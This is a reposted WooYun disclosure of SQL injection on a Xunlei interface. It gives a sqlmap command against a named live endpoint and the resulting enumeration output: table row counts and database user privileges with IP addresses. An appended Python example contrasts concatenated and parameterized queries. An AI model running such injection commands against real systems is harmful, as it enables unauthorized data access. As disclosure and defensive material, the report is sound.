Two or more SQL injections on a Xunlei site / error-based / UNION-based / business and user data exposed / Zhihu data found / DBA privileges

Posted by admin, 2017-04-22 13:16:29
Summary

2016-04-08: Details reported to the vendor; awaiting vendor handling
2016-04-08: Vendor confirmed; details disclosed to the vendor only
2016-04-18: Details disclosed to core white hats and experts in related fields
2016-04-28: Details disclosed to regular white hats
2016-05-08: Details disclosed to intern white hats
2016-05-23: Details disclosed to the public

Vulnerability overview

Defect ID: WooYun-2016-193838

Title: Two or more SQL injections on a Xunlei site / error-based / UNION-based / business and user data exposed / Zhihu data found / DBA privileges

Vendor: Xunlei

Author: hear7v

Submitted: 2016-04-08 14:16

Published: 2016-05-23 15:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor confirmed

Source: www.wooyun.org; for questions or help please contact

Tags: injection



Vulnerability details

Brief description:

Two or more injection points on a Xunlei site, error-based and UNION-based. Single tables hold tens of millions of rows and the total volume is very large; the data includes business information and user data, and Zhihu data turned up as well.

Detailed description:

python sqlmap.py -u "http://interface.k.xunlei.com/mobile_promote/manage/self_gets?operator=no_limit&user_type=100&version=2.0.2.16&province=no_limit&system_type=2?chanel&umeng-10900010&client_type=android-swjsq-2.0.2.16&peerid=EC1D7F9DADB8004V&time_and=1460018261265&client_version=androidswjsq-2.0.2.16&os=android-5.1.22ZTEQ519T" --user-agent "Dalvik/2.1.0 (Linux; U; Android 5.1; ZTE Q519T Build/LMY47D)"

Proof of vulnerability:

Database: stat
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| speep_vip2_uids | 9537056 |
| t_user_vas_20151119 | 8380318 |
| action_data | 1872421 |
| gift_o | 1612178 |
| speed_stat_by_min | 1530678 |
| formal_speed_uid_history | 1395435 |
| gift | 1004079 |
| vip_history | 975731 |
| uid2kn | 847758 |
| speed_stat_by_min_bac | 643706 |
| portal_stat_by_min | 612048 |
| t_user_vas | 445839 |
| zhifu_history | 405635 |
| speep_uids | 312878 |
| query_client_version_stat_daily | 252835 |
| speed_stat_by_min_tem | 55570 |
| zhifu_stat | 43920 |
| analyse_province_speed | 39165 |
| tem_kuainiao_user_state | 33355 |
| analyse_speed_proxy_status | 23210 |
| xl7_stat_daily | 19824 |
| analyse_feedback_codeinfo | 16912 |
| plugin_conversion_stat | 16749 |
| analyse_client_speed | 9429 |
| user_ana | 9360 |
| query_province_stat_daily | 7966 |
| pc_user_version_count_pid | 6682 |
| zhifu_stat_bac_1122 | 4685 |
| zhifu_history_1117 | 4141 |
| analyse_operator_speed | 4017 |
| user_count_daily | 3882 |
| zhifu_history_20151120 | 3291 |
| user_ana_bac | 3159 |
| query_client_stat_daily | 2347 |
| stat | 1895 |
| sys_user_pms | 1822 |
| speed_time_stat_daily | 1795 |
| analyse_speed | 1119 |
| query_operator_stat_daily | 987 |
| sys_log | 856 |
| speed_ok_identity_stat | 779 |
| zhifu_stat_desc | 768 |
| zhifu_history_batch | 649 |
| zhifu_open_cycle_stat | 644 |
| pc_user_count_pid | 290 |
| android_user_count_pid | 282 |
| ios_user_count_pid | 282 |
| plugin_speed_stat | 252 |
| query_all_stat_daily | 251 |
| zhifu_open_cycle_client_stat | 161 |
| data_user_event_day_login | 157 |
| member_count_stat | 80 |
| sys_menu | 77 |
| client_jiaoji | 63 |
| xl7_stat_id2property | 63 |
| action_type | 51 |
| sys_user_upwd_log | 50 |
| sys_user | 41 |
| dial_repeat_count_sum | 31 |
| dial_repeat_count_sum_bac | 31 |
| uid_repeat_count_sum | 31 |
| member_reserved_stat | 30 |
| plugin | 22 |
| ci_sessions | 14 |
| zhifu_client | 12 |
| client_type | 9 |
| setup_consumers | 8 |
| performance_timers | 5 |
| setup_timers | 1 |
+---------------------------------------+---------+

Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 1029 |
| help_topic | 508 |
| help_keyword | 465 |
| help_category | 38 |
| `user` | 8 |
| db | 4 |
| proxies_priv | 2 |
+---------------------------------------+---------+

Database: global
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| pc_promote_uid_14 | 130000 |
| mobile_promote | 23 |
| pc_promote | 10 |
+---------------------------------------+---------+

Database: interface
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| bind_record | 1 |
+---------------------------------------+---------+

Database: query_log
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| query_log_6_0_1 | 15787880 |
| query_log_6_0_5 | 15659917 |
| query_log_6_0_4 | 15549772 |
| query_log_6_0_6 | 15073810 |
| query_log_6_0_3 | 14976535 |
| query_log_6_0_7 | 14927479 |
| query_log_6_0_2 | 14919142 |
| query_log_8_0_1 | 13164756 |
| query_log_8_0_5 | 13140388 |
| query_log_8_0_4 | 13030371 |
| query_log_6_0_8 | 12887105 |
| query_log_6_0_9 | 12879007 |
| query_log_8_0_3 | 12654790 |
| query_log_8_0_2 | 12542332 |
| query_log_8_0_6 | 12505141 |
| query_log_8_0_7 | 12246204 |
| query_log_8_0_9 | 10856725 |
| query_log_8_0_8 | 10752162 |
| query_log_6_0_0 | 10297248 |
| query_log_6_1_1 | 10054511 |
| query_log_6_1_5 | 9998411 |
| query_log_6_1_4 | 9949178 |
| query_log_5_0_1 | 9931374 |
| query_log_6_1_2 | 9920209 |
| query_log_6_1_6 | 9776956 |
| query_log_6_1_7 | 9716618 |
| query_log_5_0_4 | 9263860 |
| query_log_5_0_5 | 9212598 |
| query_log_5_0_2 | 8976801 |
| query_log_5_0_3 | 8972922 |
| query_log_5_0_6 | 8662356 |
| query_log_6_1_3 | 8551096 |
| query_log_5_0_7 | 8548397 |
| query_log_8_0_0 | 8492903 |
| query_log_6_1_8 | 8321503 |
| query_log_6_1_9 | 8309844 |
| query_log_8_1_2 | 8121264 |
| query_log_8_1_3 | 8119303 |
| query_log_8_1_1 | 8048653 |
| query_log_8_1_5 | 8046545 |
| query_log_8_1_4 | 7990767 |
| query_log_8_1_6 | 7899025 |
| query_log_5_0_9 | 7871072 |
| query_log_8_1_7 | 7699257 |
| query_log_5_0_8 | 7484770 |
| query_log_7_0_1 | 7232183 |
| query_log_7_0_3 | 7197931 |
| query_log_7_0_2 | 7188413 |
| query_log_7_0_6 | 7122009 |
| query_log_7_0_5 | 7057586 |
| query_log_7_0_4 | 7007013 |
| query_log_6_1_0 | 6891653 |
| query_log_7_0_7 | 6878064 |
| query_log_8_1_9 | 6692157 |
| query_log_8_1_8 | 6675937 |
| query_log_5_0_0 | 6259222 |
| query_log_7_0_9 | 5927197 |
| query_log_7_0_8 | 5911811 |
| query_log_5_1_1 | 5866282 |
| query_log_5_1_2 | 5599932 |
| query_log_5_1_3 | 5548525 |
| query_log_8_1_0 | 5535330 |
| query_log_5_1_4 | 5456733 |
| query_log_5_1_5 | 5447971 |
| query_log_5_1_6 | 5285942 |
| query_log_5_1_7 | 5194566 |
| query_log_7_1_2 | 5035024 |
| query_log_7_0_0 | 5017385 |
| query_log_7_1_3 | 4979573 |
| query_log_7_1_1 | 4941787 |
| query_log_7_1_6 | 4828147 |
| query_log_7_1_5 | 4820992 |
| query_log_7_1_4 | 4785544 |
| query_log_5_1_9 | 4716656 |
| query_log_7_1_7 | 4697270 |
| query_log_5_1_8 | 4460258 |
| query_log_7_1_9 | 4072142 |
| query_log_7_1_8 | 4047269 |
| query_log_5_1_0 | 3989968 |
| query_log_7_1_0 | 3495220 |
| query_log_1_1_1 | 2063681 |
| query_log_1_1_3 | 1814603 |
| query_log_1_1_5 | 1807892 |
| query_log_1_1_4 | 1804971 |
| query_log_1_1_2 | 1804780 |
| query_log_1_1_6 | 1788879 |
| query_log_1_1_7 | 1763480 |
| query_log_1_0_4 | 220031 |
| query_log_1_0_7 | 217451 |
| query_log_0_0_4 | 214727 |
| query_log_0_0_1 | 212659 |
| query_log_0_0_2 | 212013 |
| query_log_0_0_5 | 211494 |
| query_log_0_1_3 | 207579 |
| query_log_0_0_6 | 206062 |
| query_log_1_0_2 | 205414 |
| query_log_0_1_2 | 204220 |
| query_log_0_1_1 | 200441 |
| query_log_0_0_7 | 196351 |
| query_log_0_1_5 | 194458 |
| query_log_0_1_4 | 190959 |
| query_log_0_1_6 | 189722 |
| query_log_1_0_3 | 187603 |
| query_log_0_0_9 | 175362 |
| query_log_0_1_7 | 174263 |
| query_log_0_0_8 | 173752 |
| query_log_1_0_8 | 169640 |
| query_log_0_1_9 | 162532 |
| query_log_0_1_8 | 162062 |
| query_log_1_0_9 | 160289 |
| query_log_0_1_0 | 138533 |
| query_log_0_0_0 | 138078 |
| query_log_1_0_0 | 129620 |
| query_log_9_1_2 | 122008 |
| query_log_9_1_3 | 118684 |
| query_log_9_1_6 | 112011 |
| query_log_9_1_4 | 110003 |
| query_log_9_1_5 | 109181 |
| query_log_9_0_2 | 106242 |
| query_log_9_1_7 | 105667 |
| query_log_9_0_3 | 105029 |
| query_log_9_0_4 | 98779 |
| query_log_9_0_5 | 97967 |
| query_log_9_0_6 | 97258 |
| query_log_9_1_1 | 92556 |
| query_log_9_1_9 | 91470 |
| query_log_9_0_7 | 91244 |
| query_log_9_1_8 | 90170 |
| query_log_9_0_1 | 87259 |
| query_log_9_0_9 | 81944 |
| query_log_9_0_8 | 80688 |
| query_log_9_1_0 | 77087 |
| query_log_9_0_0 | 64291 |
| query_log_2_1_2 | 45687 |
| query_log_2_1_3 | 45613 |
| query_log_2_1_6 | 44156 |
| query_log_2_1_4 | 43996 |
| query_log_2_1_7 | 43580 |
| query_log_2_1_1 | 43233 |
| query_log_2_1_8 | 37270 |
| query_log_2_1_9 | 36839 |
| query_log_2_1_5 | 36600 |
| query_log_4_1_2 | 33372 |
| query_log_4_1_4 | 33129 |
| query_log_4_1_5 | 33041 |
| query_log_4_1_6 | 32879 |
| query_log_4_1_7 | 32644 |
| query_log_4_1_1 | 32613 |
| query_log_2_1_0 | 31347 |
| query_log_4_1_3 | 29328 |
| query_log_4_1_8 | 27084 |
| query_log_4_1_9 | 26897 |
| query_log_4_1_0 | 23161 |
| query_log_2_0_2 | 10909 |
| query_log_2_0_6 | 10681 |
| query_log_2_0_3 | 10551 |
| query_log_2_0_4 | 10442 |
| query_log_2_0_1 | 10151 |
| query_log_2_0_5 | 10118 |
| query_log_2_0_7 | 9564 |
| query_log_2_0_8 | 8599 |
| query_log_2_0_9 | 8540 |
| query_log_4_0_3 | 7831 |
| query_log_4_0_4 | 7580 |
| query_log_4_0_6 | 7565 |
| query_log_4_0_5 | 7227 |
| query_log_4_0_2 | 7009 |
| query_log_2_0_0 | 6832 |
| query_log_4_0_1 | 6590 |
| query_log_4_0_7 | 6491 |
| query_log_4_0_8 | 5711 |
| query_log_4_0_9 | 5542 |
| query_log_4_0_0 | 4384 |
| query_log_10_0_7 | 509 |
| query_log_10_1_7 | 287 |
| query_log_3_0_1 | 210 |
| query_log_3_0_6 | 182 |
| query_log_3_0_2 | 151 |
| query_log_3_0_5 | 144 |
| query_log_3_0_7 | 140 |
| query_log_3_0_4 | 135 |
| query_log_3_1_1 | 124 |
| query_log_3_0_3 | 123 |
| query_log_3_1_6 | 120 |
| query_log_3_1_2 | 96 |
| query_log_3_1_7 | 94 |
| query_log_3_1_4 | 89 |
| query_log_3_1_3 | 85 |
| query_log_3_1_5 | 85 |
| query_log_3_0_9 | 30 |
| query_log_11_1_7 | 24 |
| query_log_3_1_9 | 24 |
| query_log_3_0_8 | 20 |
| query_log_3_1_8 | 20 |
| query_log_3_1_0 | 15 |
| query_log_3_0_0 | 12 |
| query_log_11_0_7 | 11 |
+---------------------------------------+---------+

Database: access_log
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| access_log_20160404 | 7697159 |
| access_log_20160406 | 7336387 |
| access_log_20160407 | 7305092 |
| access_log_20160405 | 7259207 |
| access_log_20160331 | 5748378 |
| access_log_20160313 | 5042542 |
| access_log_20160320 | 4978698 |
| access_log_20160319 | 4927949 |
| access_log_20160312 | 4920366 |
| access_log_20160310 | 4158324 |
| access_log_20160328 | 4158209 |
| access_log_20160329 | 4157389 |
| access_log_20160227 | 4070947 |
| access_log_20160309 | 4053648 |
| access_log_20160308 | 4025162 |
| access_log_20160221 | 3944884 |
| access_log_20160304 | 3776862 |
| access_log_20160307 | 3741766 |
| access_log_20160303 | 3686839 |
| access_log_20160302 | 3669029 |
| access_log_20160226 | 3660205 |
| access_log_20160301 | 3656808 |
| access_log_20160225 | 3601496 |
| access_log_20160220 | 3595823 |
| access_log_20160229 | 3585032 |
| access_log_20160223 | 3579818 |
| access_log_20160224 | 3576439 |
| access_log_20160222 | 3549159 |
+---------------------------------------+---------+

Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| proxy_speed_log_20150926 | 522294 |
| proxy_speed_log_20150919 | 495252 |
| proxy_speed_log_20150920 | 478269 |
| proxy_speed_log_20150925 | 465590 |
| proxy_speed_log_20150913 | 435380 |
| proxy_speed_log_20150918 | 434254 |
| proxy_speed_log_20150912 | 433320 |
| proxy_speed_log_20150924 | 424070 |
| proxy_speed_log_20150921 | 418395 |
| proxy_speed_log_20150923 | 416164 |
| proxy_speed_log_20150922 | 407650 |
| proxy_speed_log_20150914 | 393216 |
| proxy_speed_log_20150911 | 387210 |
| proxy_speed_log_20150917 | 363995 |
| proxy_speed_log_20150915 | 355420 |
| proxy_speed_log_20150916 | 350006 |
+---------------------------------------+---------+

Database: tips
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tips_uid_54 | 130000 |
| tips_pid_36 | 96494 |
| tips_pid_38 | 96494 |
| tips_pid_32 | 50000 |
| tips_pid_34 | 46492 |
| tips | 29 |
| tips_pid_22 | 4 |
| tips_pid_26 | 4 |
| tips_pid_28 | 4 |
| tips_pid_30 | 4 |
| tips_pid_18 | 3 |
| tips_pid_24 | 3 |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 2474 |
| STATISTICS | 582 |
| TABLES | 441 |
| SESSION_VARIABLES | 326 |
| GLOBAL_VARIABLES | 315 |
| GLOBAL_STATUS | 287 |
| SESSION_STATUS | 287 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| KEY_COLUMN_USAGE | 129 |
| USER_PRIVILEGES | 92 |
| TABLE_CONSTRAINTS | 83 |
| PROCESSLIST | 63 |
| CHARACTER_SETS | 39 |
| PLUGINS | 17 |
| SCHEMA_PRIVILEGES | 16 |
| SCHEMATA | 10 |
| ENGINES | 6 |
| INNODB_CMP | 5 |
| INNODB_CMP_RESET | 5 |
| INNODB_CMPMEM | 5 |
| INNODB_CMPMEM_RESET | 5 |
| INNODB_TRX | 1 |
+---------------------------------------+---------+

database management system users privileges:
[*] 'nagios'@'127.0.0.1' (administrator) [2]:
    privilege: REPLICATION CLIENT
    privilege: SUPER
[*] 'root'@'111.161.24.187' [1]:
    privilege: USAGE
[*] 'root'@'123.150.185.187' [1]:
    privilege: USAGE
[*] 'root'@'127.0.0.1' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'::1' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'slave'@'111.161.24.187' [2]:
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
[*] 'slave'@'123.150.185.187' [2]:
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE

Fix suggestion:

Filter the input. This one has no filtering at all. I hear gifts are being handed out.
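The fix suggestion above amounts to "validate the input"; the usual root cause behind a "no filtering at all" finding on a filter endpoint like the self_gets request in the sqlmap command is a WHERE clause assembled by string concatenation. The Python below is an added example, not code from the report or from Xunlei: it assumes a table keyed by the request's operator/user_type/province/system_type parameters, with no_limit meaning "do not filter on this column", and shows that concatenated builder beside a bound-parameter version in which user input can no longer change the SQL text.

```python
import sqlite3

# Constructed sample table. Column names mirror the self_gets query parameters
# seen in the report (operator, user_type, province, system_type); the schema
# itself is an assumption, not something the report shows.
SAMPLE_ROWS = [
    ("cmcc", 100, "guangdong", 2, "promo-A"),
    ("cucc", 100, "beijing", 2, "promo-B"),
    ("ctcc", 200, "guangdong", 1, "promo-C"),
]
FILTER_COLUMNS = ("operator", "user_type", "province", "system_type")


def _open_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mobile_promote(operator TEXT, user_type INTEGER,"
                 " province TEXT, system_type INTEGER, name TEXT)")
    conn.executemany("INSERT INTO mobile_promote VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def self_gets_vulnerable(params):
    """WHERE clause built by string concatenation: the 'no filtering at all' the
    report describes. 'no_limit' is assumed to mean 'do not filter on this column'."""
    clauses = ["1=1"]
    for col in FILTER_COLUMNS:
        value = params.get(col, "no_limit")
        if value != "no_limit":
            clauses.append(f"{col} = '{value}'")   # user input lands inside the SQL text
    sql = "SELECT name FROM mobile_promote WHERE " + " AND ".join(clauses)
    return [row[0] for row in _open_db().execute(sql)]


def self_gets_hardened(params):
    """Same query shape; column names come only from the fixed allowlist and every
    value is passed as a bound parameter, so input can never alter the SQL text."""
    clauses, args = ["1=1"], []
    for col in FILTER_COLUMNS:
        value = params.get(col, "no_limit")
        if value != "no_limit":
            clauses.append(f"{col} = ?")
            args.append(value)
    sql = "SELECT name FROM mobile_promote WHERE " + " AND ".join(clauses)
    return [row[0] for row in _open_db().execute(sql, args)]


if __name__ == "__main__":
    probe = {"operator": "x' OR '1'='1"}   # textbook tautology, run only against the in-memory table
    print("vulnerable:", self_gets_vulnerable(probe))   # every row comes back
    print("hardened:  ", self_gets_hardened(probe))     # no operator has that literal name
```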

Copyright notice: please credit the source when reposting: hear7v@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2016-04-08 15:16

Vendor reply:

Thank you for your feedback; staff have been assigned to handle it.

Latest status:

None yet



Comments

  1. 2016-04-08 16:40 | hear7v (regular white hat | Rank: 175, vulnerabilities: 26 | looking for a team to take me in)

    1

    One more and I'd be a regular white hat.
